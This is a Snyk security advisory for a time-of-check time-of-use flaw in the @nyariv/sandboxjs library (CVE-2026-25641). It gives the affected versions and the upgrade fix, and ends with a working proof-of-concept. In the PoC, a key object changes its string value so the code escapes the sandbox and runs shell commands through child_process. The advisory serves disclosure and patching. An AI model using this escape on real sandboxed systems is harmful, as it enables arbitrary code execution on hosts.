Homepage

Time-of-check Time-of-use (TOCTOU) Race Condition Affecting @nyariv/sandboxjs package, versions <0.8.29

Severity

 Recommended
0.0
critical
0
10

CVSS assessment by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of Concept
EPSS
0.04% (11th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Time-of-check Time-of-use (TOCTOU) Race Condition vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JS-NYARIVSANDBOXJS-15248293
  • published8 Feb 2026
  • disclosed5 Feb 2026
  • creditCristian-Alexandru STAICU
Report a new vulnerability Found a mistake?

Introduced: 5 Feb 2026

NewCVE-2026-25641  (opens in a new tab)
CWE-367  (opens in a new tab)

How to fix?

Upgrade @nyariv/sandboxjs to version 0.8.29 or higher.

Overview

@nyariv/sandboxjs is a Javascript sandboxing library.

Affected versions of this package are vulnerable to Time-of-check Time-of-use (TOCTOU) Race Condition in addOps() and other methods in executor.ts, which do not enforce the type of property keys. An attacker can execute arbitrary code on the underlying system by supplying a malicious object that passes key sanitization and subsequently manipulates key coercion to use an unsafe type when the key is accessed.

PoC

const Sandbox = require('@nyariv/sandboxjs').default;

const code = `
let a = new Map;
a.x = 23;
let count = 0;

let nastyProp = {toString: () => {if (count<1){count++;return "x"} else return "__proto__"}}
let mapProt = a[nastyProp];
mapProt.has = isFinite;
console.log(
  isFinite.constructor(
    "return process.getBuiltinModule('child_process').execSync('ls -lah').toString()",
  )(),
);`;
const scope = {};
const sandbox = new Sandbox();
const exec = sandbox.compile(code);
exec(scope).run();

CVSS Base Scores

version 4.0
version 3.1